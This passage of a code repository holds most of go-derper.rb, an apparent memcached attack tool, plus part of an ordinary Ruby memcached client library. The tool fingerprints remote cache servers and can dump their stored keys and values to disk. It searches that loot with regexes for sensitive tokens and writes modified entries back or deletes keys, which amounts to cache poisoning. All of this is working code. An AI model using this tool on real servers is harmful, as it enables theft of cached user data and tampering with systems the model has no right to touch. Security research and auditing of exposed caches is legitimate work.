#{pretty_num(fp[:cache][:total_slabs])}" 368 | puts "Stats capabilities: #{fp[:runenv][:capabilities].join(" ")}" 369 | puts "" 370 | end 371 | 372 | end 373 | 374 | def process_items(items_in) 375 | items_out = {} 376 | total_items=0 377 | items_in.keys.each do |k| 378 | (prefix,s_num,label) = k.split(/:/) 379 | throw Exception.new("stats data malformed, can't split(/,/) \"#{k}\" into three") if prefix.nil? or s_num.nil? or label.nil? 380 | s_num = s_num.to_i 381 | items_out[s_num] = {} if items_out[s_num].nil? 382 | 383 | items_out[s_num][label.to_sym] = items_in[k] 384 | 385 | total_items+= items_in[k].to_i if label.to_sym == :number 386 | end 387 | {:items=>items_out,:total_items=>total_items,:total_slabs=>items_out.length} 388 | end 389 | 390 | def fingerprint 391 | fp = {:runenv=>{},:memory=>{},:cache=>{},:network=>{}} 392 | 393 | fp[:runenv][:capabilities]=@cache.probe_stats_capabilities 394 | data=refresh_cache("").dup 395 | fp[:runenv][:pid]=data["pid"] 396 | fp[:runenv][:uptime]=data["uptime"] 397 | fp[:runenv][:time]=data["time"] 398 | fp[:runenv][:version]=data["version"] 399 | fp[:runenv][:rusage_user]=data["rusage_user"] 400 | fp[:runenv][:rusage_system]=data["rusage_system"] 401 | fp[:runenv][:curr_connections]=data["curr_connections"] 402 | fp[:network][:bytes_read]=data["bytes_read"] 403 | fp[:network][:bytes_written]=data["bytes_written"] 404 | fp[:cache][:cmd_get]=data["cmd_get"] 405 | fp[:cache][:cmd_set]=data["cmd_set"] 406 | fp[:cache][:bytes]=data["bytes"] 407 | fp[:cache][:curr_items]=data["curr_items"] 408 | 409 | 410 | begin 411 | data=refresh_cache("settings").dup 412 | fp[:memory][:maxbytes]=data["maxbytes"] 413 | fp[:memory][:item_size_max]=data["item_size_max"] 414 | rescue MemCache::MemCacheError 415 | fp[:memory][:maxbytes]=-1 416 | fp[:memory][:item_size_max]=-1 417 | end 418 | 419 | begin 420 | data=refresh_cache("items").dup 421 | items=process_items(data) 422 | fp[:cache][:total_items]=items[:total_items] 423 | fp[:cache][:total_slabs]=items[:total_slabs] 424 | rescue MemCache::MemCacheError 425 | fp[:cache][:total_items]=-1 426 | fp[:cache][:total_slabs]=-1 427 | end 428 | fp 429 | end 430 | 431 | def get_version 432 | self.get_field("version") 433 | end 434 | end 435 | 436 | def usage 437 | puts " 438 | go-derper.rb v0.11 (c) marco@sensepost.com 439 | 440 | \t-h\thelp 441 | \t-s\t 442 | \t-p\t 443 | \t-n\t 444 | \t-S\tstats summary mode 445 | \t-t\t 446 | \t-L\tlist all slabs 447 | \t-l\tleach mode 448 | \t-k\t 449 | \t-d\t 450 | \t-K\t (leach mode) 451 | \t-R\t 452 | \t-m\t monitor mode 453 | \t-M\t (monitor mode) 454 | \t-f\t 455 | \t-F\t 456 | \t-c\t[ csv | multiline ] fingerprint output format (multiline is default) 457 | \t-o\t (must exist) 458 | \t-i\tinclude the slabs_id in output filename 459 | \t-r\t 460 | \t-v\tverbose (multiple for more) 461 | \t-w\t 462 | \t-z\tdetect and expand zlib streams 463 | " 464 | end 465 | 466 | opt = GetoptLong.new( 467 | ["--help", "-h", GetoptLong::NO_ARGUMENT], 468 | ["--server", "-s", GetoptLong::REQUIRED_ARGUMENT], 469 | ["--port", "-p", GetoptLong::OPTIONAL_ARGUMENT], 470 | ["--namespace", "-n", GetoptLong::REQUIRED_ARGUMENT], 471 | ["--stats", "-S", GetoptLong::OPTIONAL_ARGUMENT], 472 | ["--timeout", "-t", GetoptLong::REQUIRED_ARGUMENT], 473 | ["--leach", "-l", GetoptLong::OPTIONAL_ARGUMENT], 474 | ["--keylimit", "-K", GetoptLong::REQUIRED_ARGUMENT], 475 | ["--key", "-k", GetoptLong::REQUIRED_ARGUMENT], 476 | ["--delete-key", "-d", GetoptLong::REQUIRED_ARGUMENT], 477 | ["--regexes", "-R", GetoptLong::REQUIRED_ARGUMENT], 478 | ["--monitor", "-m", GetoptLong::OPTIONAL_ARGUMENT], 479 | ["--monitor-gap", "-M", GetoptLong::REQUIRED_ARGUMENT], 480 | ["--fingerprint", "-f", GetoptLong::REQUIRED_ARGUMENT], 481 | ["--fingerprint-file", "-F", GetoptLong::REQUIRED_ARGUMENT], 482 | ["--fingerprint-output","-c", GetoptLong::REQUIRED_ARGUMENT], 483 | ["--output-directory", "-o", GetoptLong::REQUIRED_ARGUMENT], 484 | ["--output-prefix", "-P", GetoptLong::REQUIRED_ARGUMENT], 485 | ["--quiet", "-q", GetoptLong::NO_ARGUMENT], 486 | ["--list-slabs", "-L", GetoptLong::NO_ARGUMENT], 487 | ["--include-slabs-id-in-filename", "-i", GetoptLong::NO_ARGUMENT], 488 | ["--zlib-expand", "-z", GetoptLong::NO_ARGUMENT], 489 | ["--verbose", "-v", GetoptLong::NO_ARGUMENT], 490 | ["--write", "-w", GetoptLong::REQUIRED_ARGUMENT] 491 | ) 492 | 493 | server = nil 494 | port = 11211 495 | namespace = nil 496 | mode = nil 497 | mode_inputs = nil 498 | timeout = 5 499 | monitor_gap = 10 500 | key_limit = 10 501 | output_directory = "" 502 | output_prefix = "" 503 | include_slabs_id_in_filename = false 504 | zlib_expand = false 505 | fingerprint_output="multiline" 506 | requested_key=nil 507 | delete_key=nil 508 | regexes=[] 509 | 510 | 511 | opt.each do |opt, arg| 512 | dprint "opt=#{opt},arg=#{arg}" 513 | case opt 514 | when "--help" 515 | usage 516 | exit(1) 517 | when "--server" 518 | server = arg 519 | when "--port" 520 | port = arg 521 | when "--namespace" 522 | namespace = arg 523 | when "--stats" 524 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 525 | mode = :stats 526 | if arg.nil? or arg.length == 0 527 | dprint "No args, setting to \"all\"" 528 | mode_inputs = "all" 529 | else 530 | dprint "Arg found, setting to \"#{arg}\"" 531 | mode_inputs = arg 532 | end 533 | when "--monitor" 534 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 535 | mode = :monitor 536 | mode_inputs = "" #default 537 | mode_inputs = arg if !arg.nil? 538 | when "--monitor-gap" 539 | monitor_gap = arg.to_i 540 | when "--timeout" 541 | timeout = arg.to_i 542 | when "--verbose" 543 | @@minl -= 1 if @@minl > 1 544 | when "--fingerprint" 545 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 546 | mode = :fingerprint 547 | mode_inputs = arg 548 | when "--fingerprint-file" 549 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 550 | mode = :fingerprintfile 551 | mode_inputs = arg 552 | begin 553 | f=File.open(mode_inputs) 554 | f.close 555 | rescue Exception => e 556 | eprint("Could not open file for -F: #{e.to_s}") 557 | exit(1) 558 | end 559 | when "--fingerprint-output" 560 | if arg != "multiline" and arg != "csv" then 561 | eprint("--fingerprint-output can be either \"multiline\" or \"csv\", but not \"#{arg}\"") 562 | exit(1) 563 | end 564 | fingerprint_output = arg 565 | @@minl = WARNING if arg == "csv" #raise level to warning or above when writing .csv 566 | when "--leach" 567 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 568 | mode = :leach 569 | mode_inputs = 0 #default 570 | mode_inputs = arg if !arg.nil? 571 | when "--list-slabs" 572 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 573 | mode = :list_slabs 574 | mode_inputs = 0 #default 575 | when "--delete-key" 576 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 577 | mode_inputs = arg 578 | mode = :delete_key 579 | when "--output-directory" 580 | output_directory = arg 581 | when "--output-prefix" 582 | output_prefix = arg 583 | when "--include-slabs-id-in-filename" 584 | include_slabs_id_in_filename = true 585 | when "--key" 586 | requested_key = arg 587 | when "--keylimit" 588 | key_limit = arg.to_i 589 | dprint "Keylimit set to #{key_limit}" 590 | when "--regexes" 591 | begin 592 | f=File.open(arg) 593 | f.readlines.join.split(/\n/).each do |regex| 594 | next if regex == "" or regex =~ /^#/ 595 | regexes << Regexp.new(regex, Regexp::IGNORECASE | Regexp::MULTILINE) 596 | end 597 | f.close 598 | dprint("Loaded #{regexes.length} regular expressions") 599 | rescue Exception => e 600 | eprint("Could not open file for -r: #{e.to_s}") 601 | exit(1) 602 | end 603 | when "--quiet" 604 | @@minl = NONE 605 | when "--write" 606 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 607 | mode = :writeentry 608 | mode_inputs = arg 609 | begin 610 | f=File.open(mode_inputs) 611 | f.close 612 | rescue Exception => e 613 | eprint("Could not open file for -w: #{e.to_s}") 614 | exit(1) 615 | end 616 | begin 617 | index_filename=File.dirname(mode_inputs)+"/"+File.basename(mode_inputs).split(/-/)[0]+"-index" 618 | f=File.open(index_filename) 619 | rescue Errno::NOENT 620 | eprint("Could not determine index file (#{index_filename}) for #{mode_inputs}") 621 | exit(1) 622 | end 623 | when "--zlib-expand" 624 | zlib_expand = true 625 | end 626 | end 627 | 628 | #default mode 629 | if mode.nil? then 630 | mode = :stats 631 | mode_inputs = "all" 632 | end 633 | 634 | if (mode == :monitor or mode == :stats) and (server.nil? or port.nil? or namespace.nil?) then 635 | eprint "I need a server, port and namespace. Until such time, i refuse to run." 636 | usage 637 | exit(1) 638 | end 639 | 640 | dprint "Running in mode #{mode.id2name} with input #{mode_inputs}" 641 | 642 | 643 | case mode 644 | when :stats 645 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 646 | s=Stats.new 647 | s.open(CACHE) 648 | dbgprint INFO, s.get_field(mode_inputs) 649 | when :monitor 650 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 651 | s=Stats.new 652 | s.open(CACHE) 653 | s.monitor(0, mode_inputs,monitor_gap) 654 | when :fingerprint 655 | mode_inputs.split(/,/).each do |server| 656 | begin 657 | iprint "Scanning #{server}" 658 | s=Stats.new 659 | s.open(MemCacheEx.new("#{server}", :namespace => namespace, :timeout => timeout)) 660 | s.print_fingerprint(s.fingerprint,fingerprint_output) 661 | rescue Exception => e 662 | puts e.to_s 663 | end 664 | end 665 | when :fingerprintfile 666 | File.open(mode_inputs).readlines.join.split(/\n/).each do |server| 667 | begin 668 | iprint "Scanning #{server}" 669 | s=Stats.new 670 | s.open(MemCacheEx.new("#{server}", :namespace => namespace, :timeout => timeout)) 671 | s.print_fingerprint(s.fingerprint,fingerprint_output) 672 | rescue Exception => e 673 | puts e.to_s 674 | end 675 | end 676 | when :leach 677 | #let's make sure we can write data first 678 | if output_directory == "" 679 | wprint("No output directory specified, defaulting to ./output") 680 | output_directory = "output" 681 | end 682 | 683 | begin 684 | Dir.new(output_directory) 685 | rescue Errno::ENOENT 686 | eprint("Directory #{output_directory} does not exist, please create it and run me again.") 687 | exit(1) 688 | end 689 | 690 | if output_prefix == "" 691 | i=0 692 | begin 693 | i+=1 694 | output_prefix = "run"+i.to_s 695 | end while File::exists?(output_directory+"/"+output_prefix+"-index") 696 | wprint("No prefix supplied, using \"#{output_prefix}\"") 697 | end 698 | 699 | #now conncet and pull from the cache 700 | if server.nil? or port.nil? 701 | eprint("-l requires a server specified with -s") 702 | exit(1) 703 | end 704 | 705 | #initialise the cache object 706 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 707 | l=Leacher.new 708 | l.open(CACHE) 709 | dprint "Leaching slabs_id #{mode_inputs} for #{key_limit} keys" 710 | if l.canleach? then 711 | #start leaching. heavy-lifting of retrieving keys and values falls to class Leach. here, we just supply 712 | #a handler for outputting the key,val pair to disk. we also handle zlib streams, if we find them 713 | l.leach(mode_inputs,key_limit,requested_key) do |slabs_id, key, flags, value| 714 | if !value.nil? and value.length >= 2 && zlib_expand && value[0] == 0x78 and value[1] == 0x9c then 715 | value = Zlib::Inflate.inflate(value) 716 | dprint("Inflated value is: #{value}") 717 | slabs_id = "z_"+slabs_id.to_s 718 | end 719 | key.gsub!(/,/,"IWASACOMMA") 720 | #each entry is also recorded in the index file, which saves the orginating server and key 721 | filename = output_prefix+"-"+Digest::SHA1.hexdigest(key) 722 | index_entry = "#{server}:#{port},#{slabs_id.to_s},#{key},#{flags},#{value.length},#{output_directory}/#{filename}\n" 723 | begin 724 | f_i=File.open("#{output_directory}/#{output_prefix}-index","a") 725 | f_i.write(index_entry) 726 | f_i.close 727 | 728 | f_k=File.new("#{output_directory}/#{filename}","w") 729 | f_k.write(value) 730 | f_k.close 731 | 732 | #if there are any regex matches, print to screen now 733 | regexes.each do |regex| 734 | begin 735 | m = regex.match(value) 736 | skipped=0 737 | 1.upto(m.length-1) do |i| 738 | dprint("Matched token (i="+i.to_s+"): "+m[i]) 739 | next if i!=1 and m[1].include?(m[i]) 740 | iprint("Found in #{output_directory}/#{filename} at #{m.begin(i)+skipped} -> #{m[i]}") 741 | end if m 742 | if m 743 | skipped+=m.end(0) 744 | value = value[m.end(0)..-1] 745 | end 746 | end while m 747 | end 748 | rescue Errno::ENOENT 749 | eprint("Failed to create the output file. Does the directory exist? Exiting.") 750 | exit(1) 751 | end 752 | vprint("leached from slab #{slabs_id.to_s} #{filename} -> #{key} (#{value.length.to_s} bytes)") 753 | end 754 | else 755 | eprint("Can't enable debug mode on server, leaching only through brute-force is currently unsupported") 756 | end 757 | when :list_slabs 758 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 759 | cache.get_slabs_info.each do |server,slabs| 760 | slabs.keys.each do |slabs_id| 761 | s = "" 762 | s += "\t#{slabs[slabs_id]["number"]} (Cache entries)" if !slabs[slabs_id]["number"].nil? 763 | s += "\t#{slabs[slabs_id]["chunk_size"]} (Chunk size)" if !slabs[slabs_id]["chunk_size"].nil? 764 | s += "\t#{slabs[slabs_id]["mem_requested"]} (Mem requested)" if !slabs[slabs_id]["mem_requested"].nil? 765 | iprint("\t#{server}\t#{slabs_id}#{s}") 766 | end 767 | end 768 | when :writeentry 769 | #First, determine which server and key we're going to write to. This is stored in the index file 770 | entry_filename = mode_inputs 771 | index_filename=File.dirname(entry_filename)+"/"+File.basename(entry_filename).split(/-/)[0]+"-index" 772 | dprint("Checking in #{index_filename}") 773 | server_and_port,slabs_id,key,flags,entry_size,filename = "","","","","","" 774 | begin 775 | f_i=File.open(index_filename) 776 | indexes=f_i.readlines.join.split("\n") 777 | found=false 778 | indexes.each do |index_line| 779 | (server_and_port,slabs_id,key,flags,entry_size,filename) = index_line.split(/,/) 780 | key.gsub!(/IWASACOMMA/,",") 781 | if entry_filename == filename then 782 | found=true 783 | break 784 | end 785 | end 786 | f_i.close 787 | if found == false 788 | eprint("Could not find an entry for #{entry_filename} in index file #{index_filename}") 789 | exit(1) 790 | end 791 | server,port = server_and_port.split(/:/) 792 | port = port.to_i 793 | flags=flags.to_i 794 | if server == "" or !(port>0) or slabs_id == "" or key == "" then 795 | eprint("Unknown error led to server,slabs_id or key being empty, or the port number was incorrect") 796 | exit(1) 797 | end 798 | f_e = File.open(entry_filename) 799 | entry = f_e.read(File.stat(entry_filename).size) 800 | dprint("entry is #{File.stat(entry_filename).size} bytes") 801 | f_e.close 802 | vprint("Setting entry on server #{server}:#{port.to_s} with key \"#{key}\" and flags \"#{flags}\"") 803 | dprint("Entry value is \"#{entry}\"") 804 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => (namespace==""?nil:namespace), :timeout => timeout 805 | cache.set(key,entry,0,true,flags) 806 | rescue Errno::ENOENT => e 807 | eprint("An error occurred: #{e.to_s}") 808 | end 809 | when :delete_key 810 | entry_filename = mode_inputs 811 | index_filename=File.dirname(entry_filename)+"/"+File.basename(entry_filename).split(/-/)[0]+"-index" 812 | dprint("Checking in #{index_filename}") 813 | server_and_port,slabs_id,key,flags,entry_size,filename = "","","","","","" 814 | begin 815 | f_i=File.open(index_filename) 816 | indexes=f_i.readlines.join.split("\n") 817 | found=false 818 | indexes.each do |index_line| 819 | (server_and_port,slabs_id,key,flags,entry_size,filename) = index_line.split(/,/) 820 | key.gsub!(/IWASACOMMA/,",") 821 | if entry_filename == filename then 822 | found=true 823 | break 824 | end 825 | end 826 | f_i.close 827 | if found == false 828 | eprint("Could not find an entry for #{entry_filename} in index file #{index_filename}") 829 | exit(1) 830 | end 831 | server,port = server_and_port.split(/:/) 832 | port = port.to_i 833 | flags=flags.to_i 834 | if server == "" or !(port>0) or slabs_id == "" or key == "" then 835 | eprint("Unknown error led to server,slabs_id or key being empty, or the port number was incorrect") 836 | exit(1) 837 | end 838 | 839 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => (namespace==""?nil:namespace), :timeout => timeout 840 | cache.delete(key) 841 | rescue Errno::ENOENT => e 842 | eprint("An error occurred: #{e.to_s}") 843 | end 844 | else 845 | eprint "Unknown mode" 846 | end 847 | -------------------------------------------------------------------------------- /memcache.rb: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | $TESTING = defined?($TESTING) && $TESTING 3 | 4 | require 'socket' 5 | require 'thread' 6 | require 'zlib' 7 | require 'digest/sha1' 8 | require 'net/protocol' 9 | require 'memcache/version' 10 | 11 | begin 12 | # Try to use the SystemTimer gem instead of Ruby's timeout library 13 | # when running on Ruby 1.8.x. See: 14 | # http://ph7spot.com/articles/system_timer 15 | # We don't want to bother trying to load SystemTimer on jruby, 16 | # ruby 1.9+ and rbx. 17 | if !defined?(RUBY_ENGINE) || (RUBY_ENGINE == 'ruby' && RUBY_VERSION < '1.9.0') 18 | require 'system_timer' 19 | MemCacheTimer = SystemTimer 20 | else 21 | require 'timeout' 22 | MemCacheTimer = Timeout 23 | end 24 | rescue LoadError => e 25 | puts "[memcache-client] Could not load SystemTimer gem, falling back to Ruby's slower/unsafe timeout library: #{e.message}" 26 | require 'timeout' 27 | MemCacheTimer = Timeout 28 | end 29 | 30 | 31 | ## 32 | # A Ruby client library for memcached. 33 | # 34 | 35 | class MemCache 36 | 37 | ## 38 | # Default options for the cache object. 39 | 40 | DEFAULT_OPTIONS = { 41 | :namespace => nil, 42 | :readonly => false, 43 | :multithread => true, 44 | :failover => true, 45 | :timeout => 0.5, 46 | :logger => nil, 47 | :no_reply => false, 48 | :check_size => true, 49 | :autofix_keys => false, 50 | :namespace_separator => ':', 51 | } 52 | 53 | ## 54 | # Default memcached port. 55 | 56 | DEFAULT_PORT = 11211 57 | 58 | ## 59 | # Default memcached server weight. 60 | 61 | DEFAULT_WEIGHT = 1 62 | 63 | ## 64 | # The namespace for this instance 65 | 66 | attr_reader :namespace 67 | 68 | ## 69 | # The multithread setting for this instance 70 | 71 | attr_reader :multithread 72 | 73 | ## 74 | # Whether to try to fix keys that are too long and will be truncated by 75 | # using their SHA1 hash instead. 76 | # The hash is only used on keys longer than 250 characters, or containing spaces, 77 | # to avoid impacting performance unnecesarily. 78 | # 79 | # In theory, your code should generate correct keys when calling memcache, 80 | # so it's your responsibility and you should try to fix this problem at its source. 81 | # 82 | # But if that's not possible, enable this option and memcache-client will give you a hand. 83 | 84 | attr_reader :autofix_keys 85 | 86 | ## 87 | # The servers this client talks to. Play at your own peril. 88 | 89 | attr_reader :servers 90 | 91 | ## 92 | # Socket timeout limit with this client, defaults to 0.5 sec. 93 | # Set to nil to disable timeouts. 94 | 95 | attr_reader :timeout 96 | 97 | ## 98 | # Should the client try to failover to another server if the 99 | # first server is down? Defaults to true. 100 | 101 | attr_reader :failover 102 | 103 | ## 104 | # Log debug/info/warn/error to the given Logger, defaults to nil. 105 | 106 | attr_reader :logger 107 | 108 | ## 109 | # Don't send or look for a reply from the memcached server for write operations. 110 | # Please note this feature only works in memcached 1.2.5 and later. Earlier 111 | # versions will reply with "ERROR". 112 | attr_reader :no_reply 113 | 114 | ## 115 | # Accepts a list of +servers+ and a list of +opts+. +servers+ may be 116 | # omitted. See +servers=+ for acceptable server list arguments. 117 | # 118 | # Valid options for +opts+ are: 119 | # 120 | # [:namespace] Prepends this value to all keys added or retrieved. 121 | # [:readonly] Raises an exception on cache writes when true. 122 | # [:multithread] Wraps cache access in a Mutex for thread safety. Defaults to true. 123 | # [:failover] Should the client try to failover to another server if the 124 | # first server is down? Defaults to true. 125 | # [:timeout] Time to use as the socket read timeout. Defaults to 0.5 sec, 126 | # set to nil to disable timeouts. 127 | # [:logger] Logger to use for info/debug output, defaults to nil 128 | # [:no_reply] Don't bother looking for a reply for write operations (i.e. they 129 | # become 'fire and forget'), memcached 1.2.5 and later only, speeds up 130 | # set/add/delete/incr/decr significantly. 131 | # [:check_size] Raises a MemCacheError if the value to be set is greater than 1 MB, which 132 | # is the maximum key size for the standard memcached server. Defaults to true. 133 | # [:autofix_keys] If a key is longer than 250 characters or contains spaces, 134 | # use an SHA1 hash instead, to prevent collisions on truncated keys. 135 | # Other options are ignored. 136 | 137 | def initialize(*args) 138 | servers = [] 139 | opts = {} 140 | 141 | case args.length 142 | when 0 then # NOP 143 | when 1 then 144 | arg = args.shift 145 | case arg 146 | when Hash then opts = arg 147 | when Array then servers = arg 148 | when String then servers = [arg] 149 | else raise ArgumentError, 'first argument must be Array, Hash or String' 150 | end 151 | when 2 then 152 | servers, opts = args 153 | else 154 | raise ArgumentError, "wrong number of arguments (#{args.length} for 2)" 155 | end 156 | 157 | @evented = defined?(EM) && EM.reactor_running? 158 | opts = DEFAULT_OPTIONS.merge opts 159 | @namespace = opts[:namespace] 160 | @readonly = opts[:readonly] 161 | @multithread = opts[:multithread] && !@evented 162 | @autofix_keys = opts[:autofix_keys] 163 | @timeout = opts[:timeout] 164 | @failover = opts[:failover] 165 | @logger = opts[:logger] 166 | @no_reply = opts[:no_reply] 167 | @check_size = opts[:check_size] 168 | @namespace_separator = opts[:namespace_separator] 169 | @mutex = Mutex.new if @multithread 170 | 171 | logger.info { "memcache-client #{VERSION} #{Array(servers).inspect}" } if logger 172 | 173 | Thread.current[:memcache_client] = self.object_id if !@multithread 174 | 175 | 176 | self.servers = servers 177 | end 178 | 179 | ## 180 | # Returns a string representation of the cache object. 181 | 182 | def inspect 183 | "" % 184 | [@servers.length, @namespace, @readonly] 185 | end 186 | 187 | ## 188 | # Returns whether there is at least one active server for the object. 189 | 190 | def active? 191 | not @servers.empty? 192 | end 193 | 194 | ## 195 | # Returns whether or not the cache object was created read only. 196 | 197 | def readonly? 198 | @readonly 199 | end 200 | 201 | ## 202 | # Set the servers that the requests will be distributed between. Entries 203 | # can be either strings of the form "hostname:port" or 204 | # "hostname:port:weight" or MemCache::Server objects. 205 | # 206 | def servers=(servers) 207 | # Create the server objects. 208 | @servers = Array(servers).collect do |server| 209 | case server 210 | when String 211 | host, port, weight = server.split ':', 3 212 | port ||= DEFAULT_PORT 213 | weight ||= DEFAULT_WEIGHT 214 | Server.new self, host, port, weight 215 | else 216 | server 217 | end 218 | end 219 | 220 | logger.debug { "Servers now: #{@servers.inspect}" } if logger 221 | 222 | # There's no point in doing this if there's only one server 223 | @continuum = create_continuum_for(@servers) if @servers.size > 1 224 | 225 | @servers 226 | end 227 | 228 | ## 229 | # Decrements the value for +key+ by +amount+ and returns the new value. 230 | # +key+ must already exist. If +key+ is not an integer, it is assumed to be 231 | # 0. +key+ can not be decremented below 0. 232 | 233 | def decr(key, amount = 1) 234 | raise MemCacheError, "Update of readonly cache" if @readonly 235 | with_server(key) do |server, cache_key| 236 | cache_decr server, cache_key, amount 237 | end 238 | rescue TypeError => err 239 | handle_error nil, err 240 | end 241 | 242 | ## 243 | # Retrieves +key+ from memcache. If +raw+ is false, the value will be 244 | # unmarshalled. 245 | 246 | def get(key, raw = false) 247 | with_server(key) do |server, cache_key| 248 | logger.debug { "get #{key} from #{server.inspect}" } if logger 249 | (flags,value) = cache_get server, cache_key 250 | return nil if value.nil? 251 | value = Marshal.load value unless raw 252 | return [flags,value] 253 | end 254 | rescue TypeError => err 255 | handle_error nil, err 256 | end 257 | 258 | ## 259 | # Performs a +get+ with the given +key+. If 260 | # the value does not exist and a block was given, 261 | # the block will be called and the result saved via +add+. 262 | # 263 | # If you do not provide a block, using this 264 | # method is the same as using +get+. 265 | # 266 | def fetch(key, expiry = 0, raw = false) 267 | value = get(key, raw) 268 | 269 | if value.nil? && block_given? 270 | value = yield 271 | add(key, value, expiry, raw) 272 | end 273 | 274 | value 275 | end 276 | 277 | ## 278 | # Retrieves multiple values from memcached in parallel, if possible. 279 | # 280 | # The memcached protocol supports the ability to retrieve multiple 281 | # keys in a single request. Pass in an array of keys to this method 282 | # and it will: 283 | # 284 | # 1. map the key to the appropriate memcached server 285 | # 2. send a single request to each server that has one or more key values 286 | # 287 | # Returns a hash of values. 288 | # 289 | # cache["a"] = 1 290 | # cache["b"] = 2 291 | # cache.get_multi "a", "b" # => { "a" => 1, "b" => 2 } 292 | # 293 | # Note that get_multi assumes the values are marshalled. You can pass 294 | # in :raw => true to bypass value marshalling. 295 | # 296 | # cache.get_multi('a', 'b', ..., :raw => true) 297 | 298 | def get_multi(*keys) 299 | raise MemCacheError, 'No active servers' unless active? 300 | 301 | opts = keys.last.is_a?(Hash) ? keys.pop : {} 302 | 303 | keys.flatten! 304 | key_count = keys.length 305 | cache_keys = {} 306 | server_keys = Hash.new { |h,k| h[k] = [] } 307 | 308 | # map keys to servers 309 | keys.each do |key| 310 | server, cache_key = request_setup key 311 | cache_keys[cache_key] = key 312 | server_keys[server] << cache_key 313 | end 314 | 315 | results = {} 316 | raw = opts[:raw] || false 317 | server_keys.each do |server, keys_for_server| 318 | keys_for_server_str = keys_for_server.join ' ' 319 | begin 320 | values = cache_get_multi server, keys_for_server_str 321 | values.each do |key, value| 322 | results[cache_keys[key]] = raw ? value : Marshal.load(value) 323 | end 324 | rescue IndexError => e 325 | # Ignore this server and try the others 326 | logger.warn { "Unable to retrieve #{keys_for_server.size} elements from #{server.inspect}: #{e.message}"} if logger 327 | end 328 | end 329 | 330 | return results 331 | rescue TypeError => err 332 | handle_error nil, err 333 | end 334 | 335 | ## 336 | # Increments the value for +key+ by +amount+ and returns the new value. 337 | # +key+ must already exist. If +key+ is not an integer, it is assumed to be 338 | # 0. 339 | 340 | def incr(key, amount = 1) 341 | raise MemCacheError, "Update of readonly cache" if @readonly 342 | with_server(key) do |server, cache_key| 343 | cache_incr server, cache_key, amount 344 | end 345 | rescue TypeError => err 346 | handle_error nil, err 347 | end 348 | 349 | ## 350 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 351 | # seconds. If +raw+ is true, +value+ will not be Marshalled. 352 | # 353 | # Warning: Readers should not call this method in the event of a cache miss; 354 | # see MemCache#add. 355 | 356 | ONE_MB = 1024 * 1024 357 | 358 | def set(key, value, expiry = 0, raw = false, flags = 0) 359 | raise MemCacheError, "Update of readonly cache" if @readonly 360 | 361 | value = Marshal.dump value unless raw 362 | with_server(key) do |server, cache_key| 363 | logger.debug { "set #{key} to #{server.inspect}: #{value.to_s.size}" } if logger 364 | 365 | if @check_size && value.to_s.size > ONE_MB 366 | raise MemCacheError, "Value too large, memcached can only store 1MB of data per key" 367 | end 368 | 369 | command = "set #{cache_key} #{flags} #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 370 | 371 | with_socket_management(server) do |socket| 372 | socket.write command 373 | break nil if @no_reply 374 | result = socket.gets 375 | raise_on_error_response! result 376 | 377 | if result.nil? 378 | server.close 379 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 380 | end 381 | 382 | result 383 | end 384 | end 385 | end 386 | 387 | ## 388 | # "cas" is a check and set operation which means "store this data but 389 | # only if no one else has updated since I last fetched it." This can 390 | # be used as a form of optimistic locking. 391 | # 392 | # Works in block form like so: 393 | # cache.cas('some-key') do |value| 394 | # value + 1 395 | # end 396 | # 397 | # Returns: 398 | # +nil+ if the value was not found on the memcached server. 399 | # +STORED+ if the value was updated successfully 400 | # +EXISTS+ if the value was updated by someone else since last fetch 401 | 402 | def cas(key, expiry=0, raw=false) 403 | raise MemCacheError, "Update of readonly cache" if @readonly 404 | raise MemCacheError, "A block is required" unless block_given? 405 | 406 | (value, token) = gets(key, raw) 407 | return nil unless value 408 | updated = yield value 409 | value = raw ? updated : Marshal.dump(updated) 410 | 411 | with_server(key) do |server, cache_key| 412 | logger.debug { "cas #{key} to #{server.inspect}: #{value.to_s.size}" } if logger 413 | command = "cas #{cache_key} 0 #{expiry} #{value.to_s.size} #{token}#{noreply}\r\n#{value}\r\n" 414 | 415 | with_socket_management(server) do |socket| 416 | socket.write command 417 | break nil if @no_reply 418 | result = socket.gets 419 | raise_on_error_response! result 420 | 421 | if result.nil? 422 | server.close 423 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 424 | end 425 | 426 | result 427 | end 428 | end 429 | end 430 | 431 | ## 432 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 433 | # seconds, but only if +key+ does not already exist in the cache. 434 | # If +raw+ is true, +value+ will not be Marshalled. 435 | # 436 | # Readers should call this method in the event of a cache miss, not 437 | # MemCache#set. 438 | 439 | def add(key, value, expiry = 0, raw = false) 440 | raise MemCacheError, "Update of readonly cache" if @readonly 441 | value = Marshal.dump value unless raw 442 | with_server(key) do |server, cache_key| 443 | logger.debug { "add #{key} to #{server}: #{value ? value.to_s.size : 'nil'}" } if logger 444 | command = "add #{cache_key} 0 #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 445 | 446 | with_socket_management(server) do |socket| 447 | socket.write command 448 | break nil if @no_reply 449 | result = socket.gets 450 | raise_on_error_response! result 451 | result 452 | end 453 | end 454 | end 455 | 456 | ## 457 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 458 | # seconds, but only if +key+ already exists in the cache. 459 | # If +raw+ is true, 